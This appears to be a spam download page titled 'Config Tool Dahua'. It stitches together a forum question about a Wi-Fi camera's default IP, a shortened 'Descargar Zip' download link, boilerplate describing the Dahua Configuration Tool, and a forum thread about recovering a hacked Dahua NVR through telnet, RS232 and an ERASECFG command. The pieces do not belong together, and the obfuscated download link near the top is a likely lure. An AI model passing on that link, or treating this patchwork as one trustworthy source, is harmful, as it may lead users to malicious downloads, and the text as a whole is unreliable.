Config Tool Dahua

[Jeanine Baselice]

So - trying to setup my first camera. A dahua IP camera. (Wifi) Everything says the default IP is 192.168.1.108. My network IS 192.168.1.x. Nothing shows up at 192.168.1.108. The online documentation and help from them ASSUMES that the address works or you are on the wrong network (obviously). Firewall is fully off.

config tool dahua

Descargar Zip --->>> https://tiurll.com/2yOBLF

Wish it was realistic to hardwire in my situation. But adding hardwire to a manufactured home is either:
A nightmare
Or - make your home look like a hillbilly castle with wires drilled through the middle of walls and siding.

no just hard wire to troubleshoot only once you can talk to camera then you can configure wireless.
If you have the mac that is fine but until you have done the dance with the web server that is built into the camera either manually or via the vendors config tool you will not have much luck.
I just went through this with a china branded NTP/GPS device and I refused to have to reconfigure my network just to set up their stupid web server so I did a KISS closed wired network to do my initial settings.

The download has been tested by an editor here on a PC and a list of features has been compiled; see below. We've also created some screenshots of Dahua Configuration Tool to illustrate the user interface and show the overall usage and features of this batch configuration program.

Dahua Configuration Tool is a free application for Dahua video camera owners that allows you to manage different types of surveillance cameras. With this program you can manage many cameras in the same time.

Features of Dahua Configuration Tool

• Alarm management: Manage alarms including the ability to set up alarm triggers and to receive notifications when an alarm is triggered.
• Compatibility with a range of Dahua products: including cameras, video recorders and other surveillance equipment.
• Customization options: Options that allow you to tailor the tool to your specific needs and preferences.
• Device configuration: Configure and manage your Dahua cameras and other surveillance equipment, including the ability to adjust camera settings and to view device status information.
• Easy to use: The interface makes it easy for even novice users to configure and manage their surveillance system.
• File management: Organize and manage your files, including the ability to create and manage folders, rename files and delete files.
• Network configuration: Configure and manage your network, including the ability to set up and manage IP addresses and to configure network settings such as VLANs and PPPoE.
• User management: Manage users including the ability to create and manage user accounts and to set up user permissions.

Compatibility and LicenseIs Dahua Configuration Tool free to download?Dahua Configuration Tool is provided under a freeware license on Windows from video capture software with no restrictions on usage. Download and installation of this PC software is free and 5.001 is the latest version last time we checked.

I had a client with a hacked Dahua NVR that I had to battle these past few weeks. The only way we knew it had been hacked was because we could not save any changes. We found this out when I attempted to install three additional Dahua cameras at this site.

When I was called back to the site Wednesday AM, I found that the NVR had been reverted to the settings just before I added the three cameras. It was after digging further that I found an additional user account named "service" that had a note on the account that said "your_device_has_been_hacked_ple".

I was unable to make any changes to the NVR config that would survive a reboot. My admin credentials remained intact and usable, but there was little hope of fixing the issue via the NVR GUI. I attempted to navigate CLI via telnet, but was not able to correct the issue myself.

I leaned on my Dahua OEM suppliers for their assistance in locating a newer firmware with hopes that it would overwrite / correct the permissions issues. After upgrading the firmware, the permissions issue persisted. Note that I could not run the firmware update via the GUI, I had to use the Dahua DVR Upgrade Tool Ver1.16 utility to push it to the device.

My next step was trying to again use telnet access to try and unlock the NVR. However, there was a new roadblock. The original firmware 2.608 allowed up to 8 character passwords, but the newer firmware 2.616 only allowed 6 character passwords. This made my 8 character password unusable. I could use the Dahua daily code to make changes in the NVR GUI, but these were not saved to the telnet level password list. So now I was locked out of telnet access.

My final attempt was to connect via RS232 and try to erase everything on the NVR and upload a complete firmware image. To do this, you will need a few programs, NCOM and a Cisco TFTP server app. NCOM allows you a CLI console to run commands. I was able to use the HELP command to find ERASECFG, which successfully cleared the permissions issue. I also used the NCOM/TFTP method to upload the complete Dahua firmware image (update.img).

I guess I am documenting this here in case others have a similar issue. To fend off this from happening again, we now are using a non-standard port externally forwarded to port 37777 in hopes that this will prevent its discovery by hackers again. This isn't a sure fire way to prevent future hacks, but it will surely take longer for them to find it.

So how does Dahua corporate fit into all of this? This was not an official branded Dahua product? I ask because since it is a Dahua product people will reasonably want to understand what responsibility Dahua has or not.

**** happens. Hell, 4 years is a long time for any product of this nature to be exposed to different exploits. IPVM itself reported on Axis getting blown wide open not too long ago, let alone a couple of Chinese companies who weren't all the rage back then.

John, do you know the attack vector used on my NVR? They had port 80 and 37777 forwarded from the internet. All default passwords were changed. At that time, they were eight character mixed case letters and numbers. Dahua doesn't allow other characters, like punctuation marks. I honestly don't know myself. I thought if Telnet wasn't open that this wasn't possible?

Based only on what you have posted, I would suspect that your DVR got infected through some kind of HTTP exploit. Accessing an admin script that did not require auth, or doing some kind of a form/POST hack, URL exploit, etc. Essentially, someone accessed the machine with a specific URL request that caused an exploit.

Dahua's USA office didn't even exist at the time this NVR was sold to John and the NVR (released earlier than that iPhone, btw) cost less than half of what that iPhone did. I highly doubt we're talking the same category of device. One is purely an import with barely a translation to the UI slapped on. The other was designed and supported by an American company for the American market.

Apple charges out the wazzoo to generate high margins for their cut rate equipment to give the veneer of quality. They survive on at least providing some semblance of service through software, but their hardware is garbage tucked in shiny aluminum.

And if Dahua wants to convey to the overseas market (which they have been knowingly selling into for years) that they are not going to take full responsibility for these issues, then they will suffer the consequences in the market.

I think that Dahua has resisted to go back and fix firmware/exploit issues with older models. Another roadblock is that they use different part number for all US models. On top of that, anything made prior to the USA office being created isn't supported by them.

Well, that's my personal rhetoric, not Dahua's stance. Tohan (my Dahua engineer) did actually express some willingness to help, but only through the original channel that sold it. Considering that channel has dropped Dahua as a partner it was more or less a no go.

Either way, you're talking about products designed before Dahua's foray into the US market in official capacity. The distributors who brought Dahua's product in before were companies who went and sought them out to import into the States (which is probably why GenIV and other long time distributors feel betrayed by Dahua taking their customers). This was not Dahua looking for people to sell snake oil to.

Granted, they need to improve the security of their products overall, but going back to support something that's out of your 3 year warranty sold to an OEM distributor in a country you had little presence in at the time you sold it is a bit of a task when even your primary market barely remembers that product. Heck, it didn't even get sold with Dahua's faceplate.

Apple can develop a unified firmware/OS architecture because they have a relatively similar hardware platform along generations. More powerful in increments, but still overall the same hardware command structure. For companies like Dahua and Hikvision, they have multiple chipsets to program for and QA for and some have extended capabilities and others are limited. Going from ARM/RISC to Intel/CISC changes the codebase a lot.

Somewhat correct. The client wished to add more cameras to his existing six camera system. The NVR would not allow me to add these due to the hacked nature of the system. So, Dahua made and marketed a 16 channel NVR that had the ability to only hold 6 cameras, in my client's eyes. So in order for me to add the new cameras, I had to resolve the issue. Being that I sold him the NVR to start and charged him to install it, I found myself liable to correct this issue, whether or not it was technically my responsibility to do so under any warranty. He would have purchased an NVR if I wasn't able to correct the issue. He still may choose to replace the NVR, however, I think he is afraid of Dahua at this point. We may resort to a PC/VMS instead.

d3342ee215